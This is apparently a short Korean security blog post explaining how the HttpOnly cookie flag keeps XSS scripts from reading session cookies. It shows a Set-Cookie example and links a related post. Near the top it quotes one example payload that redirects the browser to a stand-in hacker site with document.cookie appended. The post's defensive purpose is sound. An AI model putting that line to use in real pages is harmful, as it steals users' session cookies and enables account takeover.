웹 해킹 - XSS 공격으로 document.cookie 정보 가져오기 방지(HttpOnly)

728x90

해커는 아래처럼 document.cookie를 통해 중요한 쿠키 정보들을 수집하는 게 일반적

location.href = 'http://해커사이트/?cookies=' + document.cookie;

서버가 클라이언트에게 쿠키 값을 지정할 때에 HttpOnly라는 옵션을 추가시켜주면,

(HttpOnly가 Http만 허용하고, Https는 허용하지 않는다 이게 아니다..)

클라이언트가 document.cookie를 아무리 출력해 보아도 해당 쿠키에 대한 정보는 출력이 되지 않는다.

Set-Cookie: 쿠키명=쿠키값; path=/; HttpOnly

HttpOnly 설정을 한 쿠키는 브라우저가 접근을 할 수 없도록 되버린 것.

당연히 서버에게 GET, POST 요청등을 할 때에는 HttpOnly 설정된 쿠키도 잘 전달된다.

참고:

[Web] HTTP Only와 Secure Cookie 이해하기

Cookie에 대한 이해 쿠키는 ASP.NET, PHP와 같은 특정 기술영역에 국한된 것도 아니고, 특정 Client나 Server에만 국한된 기술도 아닙니다. 쿠키는 수십 년 전부터 사용되어 왔으며 최근에는 HTTP에 있어서

nsinc.tistory.com

728x90

웹 해킹 - sqlmap (0)	2022.07.24
웹 해킹 - 웹 패킷 전송 확장 프로그램 (0)	2021.12.09
웹 해킹 - NoSQL Injection 조건 표현식 (0)	2021.12.09
웹 해킹 - 크롬 스파이웨어 확장 프로그램 , Bad Extension (0)	2021.12.08
[WEB-HACKING] HTML 이벤트 속성 모음 & XSS 응용 (0)	2021.11.15

HackLog